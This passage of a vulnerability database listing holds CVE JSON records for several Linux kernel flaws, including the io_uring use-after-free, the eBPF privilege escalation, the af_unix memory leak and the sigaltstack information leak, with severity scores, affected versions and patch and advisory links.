            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/38017"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2009-3624",
    "datePublished": "2009-11-02T15:00:00",
    "dateReserved": "2009-10-09T00:00:00",
    "dateUpdated": "2024-08-07T06:38:28.323Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-3389
Vulnerability from cvelistv5
Published
2023-06-28 19:33
Modified
2024-08-02 06:55
Severity
Summary
Use after free in io_uring in the Linux Kernel
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T06:55:02.753Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-5.15.y\u0026id=0e388fce7aec40992eadee654193cad345d62663"
          },
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-5.10.y\u0026id=4716c73b188566865bdd79c3a6709696a224ac04"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/0e388fce7aec40992eadee654193cad345d62663"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/4716c73b188566865bdd79c3a6709696a224ac04"
          },
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ef7dfac51d8ed961b742218f526bd589f3900a59"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/ef7dfac51d8ed961b742218f526bd589f3900a59"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20230731-0001/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5480"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.4",
              "status": "affected",
              "version": "5.13",
              "versionType": "custom"
            },
            {
              "lessThan": "5.10.185",
              "status": "affected",
              "version": "5.10.162",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Querijn Voet"
        }
      ],
      "datePublic": "2023-06-18T02:21:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "A use-after-free vulnerability in the Linux Kernel io_uring subsystem can be exploited to achieve local privilege escalation.\u003cbr\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eRacing a io_uring cancel poll request with a linked timeout can cause a UAF in a hrtimer.\u003c/span\u003e\u003cbr\u003e\u003cbr\u003eWe recommend upgrading past commit ef7dfac51d8ed961b742218f526bd589f3900a59 (4716c73b188566865bdd79c3a6709696a224ac04 for 5.10 stable and\u0026nbsp;0e388fce7aec40992eadee654193cad345d62663 for 5.15 stable).\u003cbr\u003e\u003cbr\u003e"
            }
          ],
          "value": "A use-after-free vulnerability in the Linux Kernel io_uring subsystem can be exploited to achieve local privilege escalation.\n\nRacing a io_uring cancel poll request with a linked timeout can cause a UAF in a hrtimer.\n\nWe recommend upgrading past commit ef7dfac51d8ed961b742218f526bd589f3900a59 (4716c73b188566865bdd79c3a6709696a224ac04 for 5.10 stable and\u00a00e388fce7aec40992eadee654193cad345d62663 for 5.15 stable).\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-07-10T16:48:01.844Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-5.15.y\u0026id=0e388fce7aec40992eadee654193cad345d62663"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-5.10.y\u0026id=4716c73b188566865bdd79c3a6709696a224ac04"
        },
        {
          "url": "https://kernel.dance/0e388fce7aec40992eadee654193cad345d62663"
        },
        {
          "url": "https://kernel.dance/4716c73b188566865bdd79c3a6709696a224ac04"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ef7dfac51d8ed961b742218f526bd589f3900a59"
        },
        {
          "url": "https://kernel.dance/ef7dfac51d8ed961b742218f526bd589f3900a59"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230731-0001/"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5480"
        },
        {
          "url": "http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use after free in io_uring in the Linux Kernel",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-3389",
    "datePublished": "2023-06-28T19:33:55.097Z",
    "dateReserved": "2023-06-23T13:43:00.034Z",
    "dateUpdated": "2024-08-02T06:55:02.753Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-31440
Vulnerability from cvelistv5
Published
2021-05-21 14:30
Modified
2024-08-03 22:55
Severity
Summary
This vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel 5.11.15. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of eBPF programs. The issue results from the lack of proper validation of user-supplied eBPF programs prior to executing them. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel. Was ZDI-CAN-13661.
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T22:55:53.733Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.zerodayinitiative.com/advisories/ZDI-21-503/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=10bf4e83167cc68595b85fd73bb91e8f2c086e36"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20210706-0003/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.11.15"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Manfred Paul"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "This vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel 5.11.15. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of eBPF programs. The issue results from the lack of proper validation of user-supplied eBPF programs prior to executing them. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel. Was ZDI-CAN-13661."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-682",
              "description": "CWE-682: Incorrect Calculation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-07-06T07:06:33",
        "orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
        "shortName": "zdi"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.zerodayinitiative.com/advisories/ZDI-21-503/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=10bf4e83167cc68595b85fd73bb91e8f2c086e36"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20210706-0003/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "zdi-disclosures@trendmicro.com",
          "ID": "CVE-2021-31440",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "5.11.15"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "credit": "Manfred Paul",
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "This vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel 5.11.15. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of eBPF programs. The issue results from the lack of proper validation of user-supplied eBPF programs prior to executing them. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel. Was ZDI-CAN-13661."
            }
          ]
        },
        "impact": {
          "cvss": {
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-682: Incorrect Calculation"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.zerodayinitiative.com/advisories/ZDI-21-503/",
              "refsource": "MISC",
              "url": "https://www.zerodayinitiative.com/advisories/ZDI-21-503/"
            },
            {
              "name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=10bf4e83167cc68595b85fd73bb91e8f2c086e36",
              "refsource": "MISC",
              "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=10bf4e83167cc68595b85fd73bb91e8f2c086e36"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20210706-0003/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20210706-0003/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
    "assignerShortName": "zdi",
    "cveId": "CVE-2021-31440",
    "datePublished": "2021-05-21T14:30:14",
    "dateReserved": "2021-04-16T00:00:00",
    "dateUpdated": "2024-08-03T22:55:53.733Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3543
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel BPF af_unix.c unix_release_sock memory leak
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.530Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=7a62ed61367b8fd01bae1e18e30602c25060d824"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211043"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability, which was classified as problematic, has been found in Linux Kernel. This issue affects the function unix_sock_destructor/unix_release_sock of the file net/unix/af_unix.c of the component BPF. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211043."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-404",
              "description": "CWE-404 Denial of Service -\u003e CWE-401 Memory Leak",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-17T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=7a62ed61367b8fd01bae1e18e30602c25060d824"
        },
        {
          "url": "https://vuldb.com/?id.211043"
        }
      ],
      "title": "Linux Kernel BPF af_unix.c unix_release_sock memory leak",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3543",
    "datePublished": "2022-10-17T00:00:00",
    "dateReserved": "2022-10-17T00:00:00",
    "dateUpdated": "2024-08-03T01:14:02.530Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2009-2847
Vulnerability from cvelistv5
Published
2009-08-18 20:41
Modified
2024-08-07 06:07
Severity
Summary
The do_sigaltstack function in kernel/signal.c in Linux kernel 2.4 through 2.4.37 and 2.6 before 2.6.31-rc5, when running on 64-bit systems, does not clear certain padding bytes from a structure, which allows local users to obtain sensitive information from the kernel stack via the sigaltstack function.
References
URLTags
http://www.openwall.com/lists/oss-security/2009/08/04/1mailing-list, x_refsource_MLIST
https://bugzilla.redhat.com/show_bug.cgi?id=515392x_refsource_CONFIRM
http://secunia.com/advisories/37471third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/USN-852-1vendor-advisory, x_refsource_UBUNTU
http://rhn.redhat.com/errata/RHSA-2009-1243.htmlvendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/36759third-party-advisory, x_refsource_SECUNIA
http://www.vmware.com/security/advisories/VMSA-2009-0016.htmlx_refsource_CONFIRM
http://www.openwall.com/lists/oss-security/2009/08/26/2mailing-list, x_refsource_MLIST
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10637vdb-entry, signature, x_refsource_OVAL
http://www.securityfocus.com/archive/1/507985/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://secunia.com/advisories/36562third-party-advisory, x_refsource_SECUNIA
https://www.redhat.com/archives/fedora-package-announce/2009-August/msg01256.htmlvendor-advisory, x_refsource_FEDORA
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commitdiff%3Bh=0083fc2c50e6c5127c2802ad323adf8143ab7856x_refsource_CONFIRM
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8405vdb-entry, signature, x_refsource_OVAL
http://www.exploit-db.com/exploits/9352exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/36501third-party-advisory, x_refsource_SECUNIA
http://www.openwall.com/lists/oss-security/2009/08/05/1mailing-list, x_refsource_MLIST
http://www.redhat.com/support/errata/RHSA-2009-1438.htmlvendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2009/3316vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/37105third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/36136third-party-advisory, x_refsource_SECUNIA
Impacted products
VendorProduct
n/an/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T06:07:36.606Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "[oss-security] 20090804 CVE request - kernel: information leak in sigaltstack",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2009/08/04/1"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=515392"
          },
          {
            "name": "37471",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37471"
          },
          {
            "name": "USN-852-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "http://www.ubuntu.com/usn/USN-852-1"
          },
          {
            "name": "RHSA-2009:1243",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://rhn.redhat.com/errata/RHSA-2009-1243.html"
          },
          {
            "name": "36759",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36759"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html"
          },
          {
            "name": "[oss-security] 20090826 Re: CVE request - kernel: information leak in sigaltstack",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2009/08/26/2"
          },
          {
            "name": "oval:org.mitre.oval:def:10637",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10637"
          },
          {
            "name": "20091120 VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/507985/100/0/threaded"
          },
          {
            "name": "36562",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36562"
          },
          {
            "name": "FEDORA-2009-9044",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg01256.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commitdiff%3Bh=0083fc2c50e6c5127c2802ad323adf8143ab7856"
          },
          {
            "name": "oval:org.mitre.oval:def:8405",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8405"
          },
          {
            "name": "9352",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "http://www.exploit-db.com/exploits/9352"
          },
          {
            "name": "36501",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36501"
          },
          {
            "name": "[oss-security] 20090805 Re: CVE request - kernel: information leak in sigaltstack",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2009/08/05/1"
          },
          {
            "name": "RHSA-2009:1438",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://www.redhat.com/support/errata/RHSA-2009-1438.html"
          },
          {
            "name": "ADV-2009-3316",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2009/3316"
          },
          {
            "name": "37105",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37105"
          },
          {
            "name": "36136",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36136"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2009-08-01T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The do_sigaltstack function in kernel/signal.c in Linux kernel 2.4 through 2.4.37 and 2.6 before 2.6.31-rc5, when running on 64-bit systems, does not clear certain padding bytes from a structure, which allows local users to obtain sensitive information from the kernel stack via the sigaltstack function."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-10T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "[oss-security] 20090804 CVE request - kernel: information leak in sigaltstack",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2009/08/04/1"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=515392"
        },
        {
          "name": "37471",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37471"
        },
        {
          "name": "USN-852-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "http://www.ubuntu.com/usn/USN-852-1"
        },
        {
          "name": "RHSA-2009:1243",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://rhn.redhat.com/errata/RHSA-2009-1243.html"
        },
        {
          "name": "36759",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36759"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html"
        },
        {
          "name": "[oss-security] 20090826 Re: CVE request - kernel: information leak in sigaltstack",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2009/08/26/2"
        },
        {
          "name": "oval:org.mitre.oval:def:10637",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10637"
        },
        {
          "name": "20091120 VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/507985/100/0/threaded"
        },
        {
          "name": "36562",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36562"
        },
        {
          "name": "FEDORA-2009-9044",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg01256.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commitdiff%3Bh=0083fc2c50e6c5127c2802ad323adf8143ab7856"
        },
        {
          "name": "oval:org.mitre.oval:def:8405",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8405"
        },
        {
          "name": "9352",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "http://www.exploit-db.com/exploits/9352"
        },
        {
          "name": "36501",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36501"
        },
        {
          "name": "[oss-security] 20090805 Re: CVE request - kernel: information leak in sigaltstack",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2009/08/05/1"
        },
        {
          "name": "RHSA-2009:1438",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://www.redhat.com/support/errata/RHSA-2009-1438.html"
        },
        {
          "name": "ADV-2009-3316",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2009/3316"
        },
        {
          "name": "37105",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37105"
        },
        {
          "name": "36136",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36136"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2009-2847",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The do_sigaltstack function in kernel/signal.c in Linux kernel 2.4 through 2.4.37 and 2.6 before 2.6.31-rc5, when running on 64-bit systems, does not clear certain padding bytes from a structure, which allows local users to obtain sensitive information from the kernel stack via the sigaltstack function."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "[oss-security] 20090804 CVE request - kernel: information leak in sigaltstack",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2009/08/04/1"
            },
            {
              "name": "https://bugzilla.redhat.com/show_bug.cgi?id=515392",
              "refsource": "CONFIRM",
              "url": "https://bugzilla.redhat.com/show_bug.cgi?id=515392"
            },
            {
              "name": "37471",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/37471"
            },
            {
              "name": "USN-852-1",
              "refsource": "UBUNTU",
              "url": "http://www.ubuntu.com/usn/USN-852-1"
            },
            {
              "name": "RHSA-2009:1243",
              "refsource": "REDHAT",
              "url": "http://rhn.redhat.com/errata/RHSA-2009-1243.html"
            },
            {
              "name": "36759",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/36759"
            },
            {
              "name": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html",
              "refsource": "CONFIRM",
              "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html"
            },
            {
              "name": "[oss-security] 20090826 Re: CVE request - kernel: information leak in sigaltstack",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2009/08/26/2"
            },
            {
